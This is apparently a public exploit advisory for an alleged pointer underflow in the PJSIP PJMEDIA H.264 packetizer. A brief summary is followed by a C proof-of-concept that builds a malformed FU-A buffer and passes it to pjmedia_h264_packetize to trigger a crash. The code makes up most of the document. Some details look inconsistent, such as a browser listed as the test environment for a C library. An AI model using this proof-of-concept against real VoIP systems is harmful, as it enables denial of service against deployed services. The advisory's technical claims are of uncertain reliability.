=============================================================================================================================================
| # Title     : PJSIP PJMEDIA H.264 Improper FU-A State Validation in Packetizer May Lead to Pointer Underflow (DoS)                        |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                            |
| # Vendor    : https://github.com/pjsip/pjproject/blob/master/pjmedia/include/pjmedia-codec/h264_packetizer.h                              |
=============================================================================================================================================

[+] Summary    : A logical validation flaw was identified in the H.264 packetization routine within the PJMEDIA component of PJSIP. 
                 Specifically, insufficient validation of FU-A (Fragmentation Unit – Type A) state handling in pjmedia_h264_packetize() may allow malformed RTP payloads to trigger unsafe pointer arithmetic.
                 When a crafted FU-A fragment is processed with the Start bit (S) unset and without a valid preceding fragmentation context, the packetizer may compute offsets relative to an assumed NAL start position. 
				 In affected versions, improper boundary checks during this calculation can result in pointer underflow, causing out-of-bounds memory access.
                 Under typical modern memory protections (ASLR/DEP), successful exploitation is most likely limited to Denial of Service via application crash. 
				 However, depending on heap layout and runtime conditions, unintended memory reads may occur.

[+] POC   :  

#include <pjlib.h>
#include <pjmedia/h264_packetizer.h>
#include <stdio.h>

#define MTU_SIZE 1400
#define PAYLOAD_SIZE 200

int main() {
    pj_caching_pool cp;
    pj_pool_t *pool;
    pjmedia_h264_packetizer *pktz;
    pjmedia_h264_packetizer_cfg cfg;
    pj_status_t status;

    pj_init();
    pj_caching_pool_init(&cp, NULL, 1024*1024);
    pool = pj_pool_create(&cp.factory, "ExploitPool", 4096, 4096, NULL);

    pjmedia_h264_packetizer_cfg_default(&cfg);
    cfg.mtu = MTU_SIZE;
    cfg.mode = PJMEDIA_H264_PACKETIZER_MODE_NON_INTERLEAVED;
    pjmedia_h264_packetizer_create(pool, &cfg, &pktz);
    pj_uint8_t malformed_h264[PAYLOAD_SIZE];
    pj_bzero(malformed_h264, PAYLOAD_SIZE);

    malformed_h264[0] = 0x7C;
    malformed_h264[1] = 0x05;

    unsigned pos = 0;
    const pj_uint8_t *out_pkt[16];
    pj_size_t out_pkt_len[16];

    printf("[*] Starting Packetization - Target: Pointer Underflow\n");  
    pjmedia_h264_packetize(pktz, 
                           malformed_h264, 
                           PAYLOAD_SIZE, 
                           &pos, 
                           out_pkt, 
                           out_pkt_len);

    printf("[+] Process finished. If no crash, the system might be protected.\n");

    pj_pool_release(pool);
    pj_caching_pool_destroy(&cp);
    return 0;
}
	
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================